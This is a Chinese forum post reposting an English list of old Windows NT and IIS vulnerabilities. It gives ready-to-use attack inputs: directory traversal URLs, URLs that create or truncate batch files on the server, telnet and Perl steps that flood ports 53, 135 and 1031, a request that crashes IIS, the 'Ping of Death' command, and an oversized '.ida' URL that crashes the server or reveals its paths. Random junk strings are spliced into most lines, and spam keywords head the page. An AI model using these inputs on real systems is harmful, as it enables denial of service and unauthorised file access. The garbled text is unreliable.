天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

  • 
    
    <delect id="ixd07"></delect>

       找回密碼
       注冊

      QQ登錄

      只需一步,快速開始

      NT的漏洞及描述(英文)

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
      受影響系統(tǒng):4.0,iis 1.0& e# W% ]4 `1 i+ g8 P$ U
      A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.) B4 l4 X, w; K* T, O- Q/ l
      + W& Y! Y6 D7 U
      A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.! |2 T2 S; {& ^0 K$ P4 v
      2 Z( E$ M* q. S# }: t" ?: P2 N: a
      By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.. j3 w) L' M& p3 t6 ^

      $ {" Z0 O+ g  `" f$ r--------------------------------------------------------------------
      : O9 g% q0 s7 A5 O( W. ~! G: G# u8 v( i, u& k' I2 X8 F
      受影響系統(tǒng):4.03 z+ ~4 F) u3 I. ]; t
      A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
      6 E) n# ?  y7 Q3 t1 c, \: n$ O& r) ^0 ?
      If the file 'target.bat' exists, the file will be truncated.# o" i4 Y0 [7 B1 y
      8 M3 }$ ]! Y. ?+ t5 `

      / M' |' N: i, F" f  n+ r: _A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
      3 p) K/ m, e* y; ~4 W9 e5 i3 m% I' `
      ----------------------------------------------------------------------( n5 Q0 [2 h6 v7 {7 h5 _

      : r3 V$ d9 P+ C' Z6 x6 V受影響系統(tǒng):3.51,4.0
      # Q" G- e; c' w& m9 gMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      ) k% z. v6 c- n+ U3 ]
      ) I( g( n* s* I# ^The following steps;2 b* D+ A' z, f* u* q# U# c5 l& F
      : ]6 m+ e0 Q- Y& Y3 U1 b3 k
      Telnet to an NT 4.0 system on port 135
        Y* ?0 t; K  [# c) x$ PType about 10 characters followed by a <CR>
      3 r: b' E) Z) D+ I$ r. pExit Telnet
      2 y/ L# a) c' n, ?+ t' P9 ^results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      $ l( `; M5 |2 a: F; t
      # d# ~; I9 i: s# ^: yWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.% V- a) E8 s( Y& J# S3 E" \

      9 z+ |+ w/ [" d7 j: Q' PThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted./ N9 b5 J6 J, M  P5 x3 Y6 f. y
      ! w& B/ J) u7 F$ m
      If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.$ L5 T* M( z4 ]4 r  y
      " b1 `2 Y! R  I1 H* X
      The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):' ^8 w/ M% X: k( {9 I7 L3 E# E
      ' k$ W" Q8 `7 {/ L
      /*begin poke code*/
      + P5 W0 |- B+ D; J  R$ ]' \
      + ]8 L+ g/ c3 g7 Yuse Socket;
      , X; I% U* I4 _& v, ause FileHandle;
      7 {8 v! T8 }' l3 e! ~! q+ v0 O/ @require "chat2.pl";" L) j8 I) @8 _" p- E1 D1 o+ H3 G

      . n  x" D- z* S4 Q5 C% a$systemname = $ARGV[0] && shift;$ U# z: f1 f2 e  t- j
      3 O6 F$ r# H9 Q! O3 C
      $verbose = 1; # tell me what you're hitting
      5 N# z) s: R! o  b  p8 G$knownports = 1; # don't hit known problem ports
      . d: w0 i' @% a2 Dfor ($port = $0; $port<65535; $port++)
      ) N1 b8 p7 T  Y{* G* M' P% }! ]7 Q
      ; E6 n% f/ u0 U; P. U

      4 x' p  O5 ?9 N7 uif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {& f- ~1 O) Z2 r# `: ~! H. X
      next;; t. a/ L" B7 f7 W' I9 b
      }
      9 j3 V( K$ C) K$fh = chat::open_port($systemname, $port);2 x7 v) P9 b( x; o7 P
      chat::print ($fh,"This is about ten characters or more");9 A$ W% T0 d0 s/ p0 U
      if ($verbose) {& Q* q2 V. [, b' k7 u
      print "Trying port: $port\n";4 s9 i+ R" L5 m% N
      } & I) ^* u2 I2 l+ u/ @
      chat::close($fh);9 U' k6 ]2 Z1 ~- @) N* M$ x! i
        r6 Y1 Y$ {: p% g. V# I( i
      }" X  Z1 N- b& I5 u/ f/ g
      " T% g( z4 y% {9 O' p3 a8 Y9 \

      8 ~2 E- P' i! M& d7 `+ B4 }  [/*end poke code*/8 U3 f. M7 k7 r  q; g/ b& x
      9 {5 R/ A' @1 W0 n" O& G9 y8 F7 k
      Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
      4 ^, `- S" i# s  {) |" H' c0 x
      - x, f  h7 b$ J4 j/ S, ^* n$ O+ n--------------------------------------------------------------------------------( i* V. V8 Z- z5 t- k# U

      3 T) [' D7 S2 Z$ h3 J# u受影響系統(tǒng):4.0
      2 X. f( e0 N: H# |! O. QUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.$ y" I! g+ a  B) z3 A0 k$ }. n
      % o9 u2 b& k8 e) T+ ^
      This attack causes Dr. Watson to display an alert window and to log an error:
      5 q& u. B1 h' C9 h" g
      0 M1 F0 e/ i  B0 r"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
      $ I. @$ J! Q  \3 p
      7 Z9 W4 D6 _+ d--------------------------------------------------------------------------------
      + f* a, X4 ^* ~! O: L. g, f" i
      . {$ A: u3 ?# G8 `' b受影響系統(tǒng):3.51,4.0
      " q; }0 _! R( b: a6 }Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:# c/ f) ?, Z4 a; z

      ! U/ E8 Z# N2 H: HSTOP: 0X0000001E
      ; \8 e- p( B  {' T. XKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
      . J8 A. x3 l1 X, |1 Q" v/ y6 ]/ T
      5 u0 b' T4 s9 Y5 e-OR-$ G  B0 J) T& T
      / Y1 }% c$ T9 Z& ~3 L  M4 A
      STOP: 0x0000000A
      7 L+ F7 |. k$ ^, h0 YIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS2 |% o: u2 W! N) w
      . D2 J/ }: s- m' ]( D
      NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
      % t: }" ~  j! ?9 w( B- L
      6 F8 z* }! j* C9 L--------------------------------------------------------------------------------5 F  E4 X3 }' Z$ J' k

      0 k  P6 E, s5 o& A/ R4 F; WMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
      ! y" n3 O% z8 Y2 v
      / `$ D' m0 j& \9 a* B# G3 B--------------------------------------------------------
      # P7 I/ f% `" k8 v0 M1 H' l) e; j3 d/ M; b5 @2 u
      IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
      您需要登錄后才可以回帖 登錄 | 注冊

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

      GMT+8, 2025-8-9 22:14

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表